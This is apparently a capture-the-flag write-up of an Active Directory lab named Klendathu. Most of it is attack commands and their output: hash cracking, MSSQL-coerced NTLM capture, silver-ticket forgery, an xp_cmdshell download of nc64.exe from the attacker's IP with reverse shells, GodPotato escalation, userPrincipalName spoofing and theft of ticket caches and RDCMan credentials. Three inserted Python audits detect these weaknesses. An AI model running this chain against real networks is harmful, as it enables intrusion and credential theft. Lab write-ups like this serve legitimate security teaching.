vulnlab-klendathu

Klendathu, an insane-rated AD chain.

Solved with: an NFS share containing a switch config file with the password hash of zim@klendathu.vl; guest access on the MSSQL service, where sys.dm_os_file_exists forces the service account to authenticate to us; forging a silver ticket and then escalating privileges on SRV1; spoofing a domain user on SRV2 via the MSSQL service account's write access; then using ntdissector, a Swiss-army knife for your NTDS.dit files; and decrypting RDCMan credentials with the domain backup key using rdgdec.py.


NFS Enum

$ showmount -e srv2.klendathu.vl
Export list for srv2.klendathu.vl:
/mnt/nfs_shares *


$ sudo mount -t nfs srv2.klendathu.vl:/mnt/nfs_shares /home/puck/vulnlab/klendathu/shares


(puck㉿kali)-[~/vulnlab/klendathu/shares]
$ cat Switch344_running-config.cfg           
Switch344#show running-config
Building configuration...
Current configuration : 4716 bytes
version 12.2
..snip..
enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/
enable password C1sc0
..snip..
snmp-server community public RO 
snmp-server contact ZIM@KLENDATHU.VL
!
end
Switch344#
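The switch backup above is the kind of file that should never sit on a world-readable NFS export: it carries an md5crypt `enable secret`, a cleartext `enable password` and a default SNMP community. As an added example (not part of the original write-up), the following Python audit scans an IOS running-config for credential material and rates it by how directly it can be abused. The sample config and its hash values are constructed placeholders modelled on the file above, not the real switch config.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample running-config; it mirrors the kind of switch backup that
# was sitting on the NFS export (hash values are placeholders, not real hashes).
SAMPLE_CONFIG = """\
Switch344#show running-config
version 12.2
hostname Switch344
enable secret 5 $1$PLACEHOLDER$PLACEHOLDERPLACEHOLDER
enable password C1sc0
username admin privilege 15 password 7 0822455D0A16
username ops secret 9 $9$PLACEHOLDER$PLACEHOLDER
snmp-server community public RO
snmp-server community s3cr3tRW RW
!
end
"""

# Cisco IOS credential "types": no type or 0 = cleartext, 7 = reversible
# Vigenere, 5 = md5crypt (offline-crackable, as the write-up shows);
# 8 = PBKDF2-SHA256 and 9 = scrypt are the recommended types today.
WEAK_TYPES = {"0": "cleartext", "5": "md5crypt, crackable offline", "7": "reversible Vigenere"}
STRONG_TYPES = {"8": "PBKDF2-SHA256", "9": "scrypt"}
DEFAULT_COMMUNITIES = {"public", "private"}

CRED_RE = re.compile(
    r"^(enable|username\s+\S+(?:\s+privilege\s+\d+)?)\s+(secret|password)\s+(?:(\d)\s+)?(\S+)$"
)
SNMP_RE = re.compile(r"^snmp-server community (\S+)(?:\s+(RO|RW))?", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    severity: str  # "high" or "info"
    message: str


def audit_ios_config(text: str) -> List[Finding]:
    """Flag credential material in an IOS running-config that anyone who can
    read the file could use directly or crack offline."""
    findings: List[Finding] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = CRED_RE.match(line)
        if m:
            subject, kind, ptype, _value = m.groups()
            ptype = ptype or "0"  # an untyped password is stored in cleartext
            if ptype in WEAK_TYPES:
                findings.append(Finding(n, "high", f"{subject} {kind}: type {ptype} ({WEAK_TYPES[ptype]}); migrate to type 8/9"))
            elif ptype in STRONG_TYPES:
                findings.append(Finding(n, "info", f"{subject} {kind}: type {ptype} ({STRONG_TYPES[ptype]})"))
            continue
        m = SNMP_RE.match(line)
        if m:
            community, mode = m.group(1), (m.group(2) or "RO").upper()
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append(Finding(n, "high", f"snmp community '{community}' is a well-known default ({mode})"))
            elif mode == "RW":
                findings.append(Finding(n, "high", f"snmp community '{community}' grants write access (RW)"))
            else:
                findings.append(Finding(n, "info", f"snmp community '{community}' ({mode})"))
    return findings


def count_by_severity(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


if __name__ == "__main__":
    for f in audit_ios_config(SAMPLE_CONFIG):
        print(f"line {f.line_no:>3} [{f.severity}] {f.message}")
```

Run against the sample it reports five high findings (the type 5 secret, the cleartext enable password, the type 7 user password, the `public` community and the RW community) and one informational type 9 entry; the same scan over real backups pulled from file shares is a quick way to decide which device passwords need rotating.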


$ ./kerbrute_linux_amd64 userenum -d klendathu.vl --dc dc1.klendathu.vl ./users.txt -v          

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/29/24 - Ronnie Flathers @ropnop

2024/08/29 10:14:58 >  Using KDC(s):
2024/08/29 10:14:58 >  	dc1.klendathu.vl:88

2024/08/29 10:14:58 >  [!] %q - %v  Bad username: blank
2024/08/29 10:14:58 >  [+] VALID USERNAME:	 administrator@klendathu.vl
2024/08/29 10:14:58 >  [!] guest@klendathu.vl - USER LOCKED OUT
2024/08/29 10:15:03 >  [+] VALID USERNAME:	 zim@klendathu.vl
2024/08/29 10:15:03 >  Done! Tested 4 usernames (2 valid) in 5.043 seconds


$ hashcat -a 0 -m 500 ./ciscosecret.txt /usr/share/wordlists/rockyou.txt  --force
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:fo<redacted>22


$ netexec smb dc1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\zim:football22 
SMB         10.10.220.149   445    DC1              [*] Enumerated shares
SMB         10.10.220.149   445    DC1              Share           Permissions     Remark
SMB         10.10.220.149   445    DC1              -----           -----------     ------
SMB         10.10.220.149   445    DC1              ADMIN$                          Remote Admin
SMB         10.10.220.149   445    DC1              C$                              Default share
SMB         10.10.220.149   445    DC1              HomeDirs        READ            
SMB         10.10.220.149   445    DC1              IPC$            READ            Remote IPC
SMB         10.10.220.149   445    DC1              NETLOGON        READ            Logon server share
SMB         10.10.220.149   445    DC1              SYSVOL          READ            Logon server share


$ netexec smb srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares 
SMB         10.10.220.150   445    SRV1             [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.150   445    SRV1             [+] KLENDATHU.VL\zim:football22 
SMB         10.10.220.150   445    SRV1             [*] Enumerated shares
SMB         10.10.220.150   445    SRV1             Share           Permissions     Remark
SMB         10.10.220.150   445    SRV1             -----           -----------     ------
SMB         10.10.220.150   445    SRV1             ADMIN$                          Remote Admin
SMB         10.10.220.150   445    SRV1             C$                              Default share
SMB         10.10.220.150   445    SRV1             IPC$            READ            Remote IPC


$ impacket-smbclient zim@dc1.klendathu.vl   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:fo<redacted>22
Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# ls
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 .
drw-rw-rw-          0  Mon Apr 15 18:09:19 2024 ..
drw-rw-rw-          0  Fri Apr 12 06:07:56 2024 CLEA
drw-rw-rw-          0  Fri Apr 12 06:08:12 2024 DUNN
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 JENKINS
drw-rw-rw-          0  Fri Apr 12 06:08:59 2024 SHUJUMI
# cd CLEA
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Bloodhound Enum

$ bloodhound-python -d klendathu.vl -c all -u zim -p fo<redacted>22 -ns 10.10.220.149 --zip        
INFO: Found AD domain: klendathu.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 26 users
INFO: Found 57 groups
INFO: Found 6 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: srv2.klendathu.vl
INFO: Querying computer: SRV1.KLENDATHU.VL
INFO: Querying computer: WS1.KLENDATHU.VL
INFO: Querying computer: DC1.KLENDATHU.VL
INFO: Done in 00M 05S
INFO: Compressing output into 20240829103520_bloodhound.zip

MSSQL access

MSSQL is running on SRV1, so we check whether we can log in there.

$ netexec mssql srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22'
MSSQL       10.10.220.150   1433   SRV1             [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL)
MSSQL       10.10.220.150   1433   SRV1             [+] KLENDATHU.VL\zim:foo<redacted>22 


$ impacket-mssqlclient klendathu.vl/zim:'fo<redacted>22'@srv1.klendathu.vl -windows-auth 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (KLENDATHU\ZIM  guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (KLENDATHU\ZIM  guest@master)> SELECT user_name()
        
-----   
guest   

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist 'C:\'
File Exists   File is a Directory   Parent Directory Exists   
-----------   -------------------   -----------------------   
          0                     1                         1   

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist '\\10.8.2.138\puck:\'
File Exists   File is a Directory   Parent Directory Exists   
-----------   -------------------   -----------------------   
          0                     0                         0   

SQL (KLENDATHU\ZIM  guest@master)> SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\')
file_exists   file_is_a_directory   parent_directory_exists   
-----------   -------------------   -----------------------   
ERROR: Line 1: The operating system returned the error '0x80070005(Access is denied.)' while attempting 'SvlPathDoesPathExist' on '\\10.8.2.138\puck\'.
SQL (KLENDATHU\ZIM  guest@master)> 

We only have guest access, but sys.dm_os_file_exists accepts a UNC path, so the SQL Server service account authenticates to our host. With Responder listening we capture the NetNTLMv2 hash of the account the MSSQL service runs as.

$ responder -I tun0

[+] Current Session Variables:
    Responder Machine Name     [WIN-GUNQV4VD574]
    Responder Domain Name      [0N40.LOCAL]
    Responder DCE-RPC Port     [47623]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.220.150
[SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK
[SMB] NTLMv2-SSP Hash     : RASCZAK::KLENDATHU:fc8c0f83e62ac68d:CCC3AE57C3615A1CD355265E9D4860BA:01<redacted>00


$ hashcat -a 0 -m 5600 ./rasczak.hash /usr/share/wordlists/rockyou.txt  --force 
hashcat (v6.2.6) starting

 this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

RASCZAK::KLENDATHU:fc8c0f83e62ac68d:ccc3ae57c3615a1cd355265e9d4860ba:010<redacted>00:st<redacted>99
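The coercion above leaves a clear trace on the SQL Server side: a low-privileged login calling a file-probing routine with a UNC path that points outside the estate. As an added example (not part of the original write-up), the Python below scans exported statement logs for that pattern. The log lines and the file-server allowlist (`fs1.klendathu.vl`) are constructed for this example and the simplified `time | login | statement` format is an assumption, not a real SQL Server Audit layout.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Procedures and statements that make SQL Server open a caller-supplied path.
# Given a UNC path, the SQL Server service account authenticates to that host,
# which is what the write-up exploited with sys.dm_os_file_exists.
PATH_PROBES = (
    "xp_fileexist", "xp_dirtree", "xp_subdirs", "dm_os_file_exists",
    "xp_cmdshell", "bulk insert", "openrowset", "to disk",
)
# A UNC path: two backslashes, a host name or IP, then a backslash.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")

# Hosts the service account is legitimately expected to reach (assumption for
# this example: a single backup file server in the domain).
KNOWN_FILE_SERVERS = {"fs1.klendathu.vl"}

# Constructed log lines in a simplified "time | login | statement" form, as one
# might export from SQL Server Audit or a sql_statement_completed XE session.
SAMPLE_LOG = r"""
2024-08-29T10:30:01 | KLENDATHU\zim | SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\')
2024-08-29T10:30:05 | KLENDATHU\zim | EXEC xp_fileexist 'C:\'
2024-08-29T10:31:00 | KLENDATHU\svc_backup | BACKUP DATABASE hr TO DISK = '\\fs1.klendathu.vl\backups\hr.bak'
2024-08-29T10:32:10 | KLENDATHU\zim | SELECT name FROM sys.databases
"""


@dataclass
class Alert:
    time: str
    login: str
    probe: str
    host: str
    severity: str  # "high" for unknown hosts, "info" for allowlisted file servers


def scan_statements(lines: Iterable[str]) -> List[Alert]:
    """Return one Alert per statement that points a path-opening routine at a UNC host."""
    alerts: List[Alert] = []
    for line in lines:
        if "|" not in line:
            continue  # blank or malformed line
        time, login, stmt = (part.strip() for part in line.split("|", 2))
        low = stmt.lower()
        probe = next((p for p in PATH_PROBES if p in low), None)
        unc = UNC_RE.search(stmt)
        if probe is None or unc is None:
            continue  # local paths and ordinary queries are not coercion attempts
        host = unc.group(1)
        severity = "info" if host.lower() in KNOWN_FILE_SERVERS else "high"
        alerts.append(Alert(time, login, probe, host, severity))
    return alerts


if __name__ == "__main__":
    for a in scan_statements(SAMPLE_LOG.splitlines()):
        print(f"{a.time} [{a.severity}] {a.login} -> {a.probe} to \\\\{a.host}")
```

On the sample the guest-level call to `sys.dm_os_file_exists` against 10.8.2.138 is raised as high, the backup to the known file server is logged as informational, and the local `xp_fileexist 'C:\'` probe is ignored. Pairing this with egress filtering of SMB (TCP 445) from database servers removes the capture opportunity entirely.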

Forging Silver Ticket

The MSSQL service runs as the RASCZAK user, so we can forge a silver ticket for the MSSQLSvc SPN on SRV1 with his NT hash.

ldapdomaindump

$ ldapdomaindump klendathu.vl -u 'klendathu\rasczak' -p 'st<redacted>99' 
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

to get the domain SID:

$ cat domain_users.grep | grep RAS
RASCZAK	RASCZAK	RASCZAK		Domain Users	04/11/24 00:35:58	08/29/24 07:55:28	08/29/24 07:55:28	NORMAL_ACCOUNT	04/12/24 03:46:53	S-1-5-21-641890747-1618203462-755025521-1131

convert the plaintext password into an NT hash:

$ iconv -f ASCII -t UTF-16LE <(printf "st<redacted>99") | openssl dgst -md4  
MD4(stdin)= e2<redacted>2c


create the silver ticket:

$ impacket-ticketer -nthash e2<redacted>2c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641890747-1618203462-755025521 administrator 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for KLENDATHU.VL/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache

$ export KRB5CCNAME=administrator.ccache

Once in the MSSQL shell, first run:

# Enable xp_cmdshell
> EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Verify we have SeImpersonatePrivilege
> xp_cmdshell "whoami /priv"


$ impacket-mssqlclient srv1.klendathu.vl -windows-auth -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (KLENDATHU.VL\administrator  dbo@master)> 
SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "echo IWR http://10.8.2.138:8000/nc64.exe -OutFile %TEMP%\nc64.exe | powershell -noprofile"
output                                                                             
--------------------------------------------------------------------------------   

PS C:\Windows\system32> IWR http://10.8.2.138:8000/nc64.exe -OutFile C:\Users\RASCZAK\AppData\Local\Temp\nc64.exe    

PS C:\Windows\system32>                                                            

SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "%TEMP%\nc64.exe 10.8.2.138 9001 -e powershell"

getting the reverse shell

$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID                                         
================= ============================================
klendathu\rasczak S-1-5-21-641890747-1618203462-755025521-1131

godpotato for privesc

PS C:\temp> ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
[*] CombaseModule: 0x140725375598592
[*] DispatchTable: 0x140725378185544
[*] UseProtseqFunction: 0x140725377480928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\314ec62a-eb25-45da-88cd-6f362aabd8cc\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003002-0ca4-ffff-4078-59003fb3e6aa
[*] DCOM obj OXID: 0xb95cceeab6278323
[*] DCOM obj OID: 0xed06ad8662383e60
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 884 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1092

getting the elevated reverse shell

$ rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55972
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami
whoami
nt authority\system
PS C:\temp> hostname
hostname
SRV1


PS C:\users> cmd -c 'dir /A'
cmd -c 'dir /A'
Microsoft Windows [Version 10.0.20348.2402]
(c) Microsoft Corporation. All rights reserved.
C:\users>
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
VL{9f<redacted>ef}

Spoofing Domain Users On GSSAPI Authentication

Checking BloodHound outbound object control for RASCZAK, we have GenericWrite and ForceChangePassword on two domain users, rico and ibanez. With these ACLs we can change their passwords using rpcclient or net rpc.

$ net rpc password "ibanez" 'Summer2024!' -U "dc1.klendathu.vl"/"Rasczak"%"st<redacted>99" -S "10.10.220.149"

verifying the credentials:

$ crackmapexec smb 10.10.220.149 -u 'ibanez' -p 'Summer2024!'
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\ibanez:Summer2024!

There is research by Ceri Coburn of Pen Test Partners showing that Linux servers joined to AD can be misconfigured in their authentication mechanism: when the enterprise name type (NT_ENTERPRISE) is used, the principal is resolved through the userPrincipalName attribute. If we have GenericWrite on a domain user, we can edit that user's userPrincipalName and thereby spoof another domain user. To abuse this we first need to identify the user we will spoof; there is a group named LINUX_ADMINS with two members, flores and leivy.

Then we set the userPrincipalName to one of those two users. The attribute can be added with ldapmodify, which needs an LDIF file.

$ ldapmodify -H ldap://dc1.klendathu.vl -a -x -D "CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL" -W -f ./modify_user.ldif
Enter LDAP Password: st<redacted>99
modifying entry "CN=ibanez,CN=users,DC=klendathu,DC=vl"


$ cat modify_user.ldif
dn: CN=ibanez,CN=users,DC=klendathu,DC=vl
changetype: modify
add: userPrincipalName
userPrincipalName: leivy

verify that the LDAP attribute was added correctly:

$ ldapsearch -x -H ldap://dc1.klendathu.vl -D "CN=ibanez,CN=USERS,DC=KLENDATHU,DC=VL" -w 'Summer2024!' -b "DC=klendathu,DC=vl" '(cn=ibanez)' | grep -I userPrincipalName
userPrincipalName: leivy
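The precondition for the spoof is visible in the directory itself: an account whose userPrincipalName names a different account (and, here, lacks the usual @suffix). As an added example (not part of the original write-up), the Python below audits a snapshot of user objects for exactly that. The user list is constructed to mirror the page's domain, and the registered UPN suffix set (`klendathu.vl` only) is an assumption; in practice the records would come from an LDAP export.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ADUser:
    sam_account_name: str
    user_principal_name: Optional[str]


# Assumption: the only UPN suffix registered for this forest is klendathu.vl.
ALLOWED_UPN_SUFFIXES = {"klendathu.vl"}

# Constructed snapshot of user objects modelled on the page's domain; ibanez
# carries the userPrincipalName that was written via ldapmodify above.
USERS = [
    ADUser("leivy", "leivy@klendathu.vl"),
    ADUser("flores", "flores@klendathu.vl"),
    ADUser("ibanez", "leivy"),
    ADUser("rico", "rico@corp.example"),
    ADUser("shujumi", None),
]


def audit_upns(users: List[ADUser]) -> List[Tuple[str, str]]:
    """Return (sAMAccountName, finding) pairs for userPrincipalName values that
    could let an NT-ENTERPRISE Kerberos logon resolve to a different account."""
    sam_index = {u.sam_account_name.lower(): u for u in users}
    findings: List[Tuple[str, str]] = []
    for u in users:
        upn = (u.user_principal_name or "").strip().lower()
        if not upn:
            continue  # no UPN set: nothing for the enterprise name type to resolve
        local, sep, suffix = upn.partition("@")
        if not sep:
            findings.append((u.sam_account_name, f"UPN '{upn}' has no @suffix"))
        elif suffix not in ALLOWED_UPN_SUFFIXES:
            findings.append((u.sam_account_name, f"UPN suffix '{suffix}' is not registered for the forest"))
        # The local part of the UPN should belong to this account, not to someone else.
        owner = sam_index.get(local)
        if owner is not None and owner is not u:
            findings.append((u.sam_account_name, f"UPN '{upn}' matches the sAMAccountName of {owner.sam_account_name}"))
    return findings


if __name__ == "__main__":
    for sam, msg in audit_upns(USERS):
        print(f"{sam}: {msg}")
```

On the sample this reports ibanez twice (suffix-less UPN, and a UPN naming leivy) and rico once for the foreign suffix; leivy and flores, whose UPN local part is their own sAMAccountName, produce nothing. Running this periodically, together with alerting on writes to userPrincipalName by accounts that are not identity-management services, catches the modification before the spoofed logon happens.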

I tried Rubeus, but this did not work for me.

c:\temp>Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise
Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Got domain: KLENDATHU.VL
[*] Using rc4_hmac hash: 72F0EEFCC213EA8F350773B831CF2C9C
[*] Building AS-REQ (w/ preauth) for: 'KLENDATHU.VL\leivy'
[*] Using domain controller: 10.10.220.149:88

[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED: 

Next I found how to add a -principal option to getTGT.py.


(puck㉿kali)-[~/vulnlab/klendathu]
$ git clone https://github.com/ar0x4/impacket.git  
$ python3 -m venv venv
$ source venv/bin/activate
$ pip3 install -r requirements.txt

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ cp examples/getTGT.py . 
                                                                                                        
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ python3 getTGT.py klendathu.vl/'leivy':'Summer2024!' -dc-ip 10.10.220.149 -principal NT_ENTERPRISE
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2023 Fortra

[*] Saving ticket in leivy.ccache


(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ export KRB5CCNAME=leivy.ccache                                      
                                                                                                        
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ klist
Ticket cache: FILE:leivy.ccache
Default principal: leivy@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:21:31  08/30/2024 02:21:31  krbtgt/KLENDATHU.VL@KLENDATHU.VL
    renew until 08/30/2024 16:21:33

We need to modify our /etc/krb5.conf:

[libdefaults]
    default_realm = KLENDATHU.VL
    dns_lookup_realm = false
    dns_lookup_kdc = true

# The following krb5.conf variables are only for MIT Kerberos.
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        rdns = false

[realms]
    KLENDATHU.VL = {
        kdc = dc1.klendathu.vl
        admin_server = dc1.klendathu.vl
    }

[domain_realm]
    .klendathu.vl = KLENDATHU.VL
    klendathu.vl = KLENDATHU.VL

Now we can SSH to srv2 using Kerberos authentication. After becoming root we go into /root/inc5543_domaincontroller_backup/ and transfer this backup to our Kali box.

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ ssh -K leivy@klendathu.vl@srv2.klendathu.vl
Last failed login: Thu Aug 29 10:26:37 EDT 2024 from 10.8.2.138 on ssh:notty
There was 1 failed login attempt since the last successful login.
[leivy@KLENDATHU.VL@srv2 ~]$ id
uid=990001115(leivy@KLENDATHU.VL) gid=990000513(domain users@KLENDATHU.VL) groups=990000513(domain users@KLENDATHU.VL),990001106(linux_admins@KLENDATHU.VL) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[leivy@KLENDATHU.VL@srv2 /]$ sudo su
[root@srv2 /]# cd /root
[root@srv2 ~]# ls
anaconda-ks.cfg  flag.txt  inc5543_domaincontroller_backup
[root@srv2 ~]# cat flag.txt
VL{8c<redacted>fd}

[root@srv2 ~]# cd inc5543_domaincontroller_backup/
[root@srv2 inc5543_domaincontroller_backup]# ls
'Active Directory'   note.txt   registry
[root@srv2 inc5543_domaincontroller_backup]# cat note.txt 
Incident: INC5543

I've included a backup of the domain controller before resetting all passwords after the last breach
[root@srv2 inc5543_domaincontroller_backup]# 

Also transfer the /tmp/krb5cc_990001135 ticket cache (it belongs to svc_backup, as klist shows below) to Kali.

Decrypting RDCMan password

┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ export KRB5CCNAME=krb5cc_990001135                                  
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ klist
Ticket cache: FILE:krb5cc_990001135
Default principal: svc_backup@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:37:51  08/30/2024 02:37:51  krbtgt/KLENDATHU.VL@KLENDATHU.VL
    renew until 09/05/2024 16:37:51
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ impacket-smbclient klendathu.vl/svc_backup@dc1.klendathu.vl -k -no-pass          
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# cd Jenkins
# ls
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 .
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 ..
-rw-rw-rw-     101234  Sat Apr 13 03:32:11 2024 AppData_Roaming_Backup.zip
-rw-rw-rw-       1077  Fri Apr 12 06:08:35 2024 jenkins.rdg
# get jenkins.rdg
# get AppData_Roaming_Backup.zip


Decrypt a .rdg password using ntdissector and dpapilab

We transfer the contents of HomeDirs/JENKINS to our Kali box, unzip AppData_Roaming_Backup.zip, and cat jenkins.rdg:

<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\administrator</profileName>
        <userName>administrator</userName>
        <password>AQ[...]ShAxQ==</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
    <properties>
      <expanded>True</expanded>
      <name>jenkins</name>
    </properties>
    <server>
      <properties>
        <name>dc1.klendathu.vl</name>
      </properties>
      <logonCredentials inherit="None">
        <profileName scope="File">KLENDATHU\administrator</profileName>
      </logonCredentials>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>

So we have an encrypted (DPAPI-protected) password.

After extracting the .zip we also have the user's DPAPI master keys under ./Roaming/Microsoft/Protect.

Next I used an Ubuntu box to do the decryption.
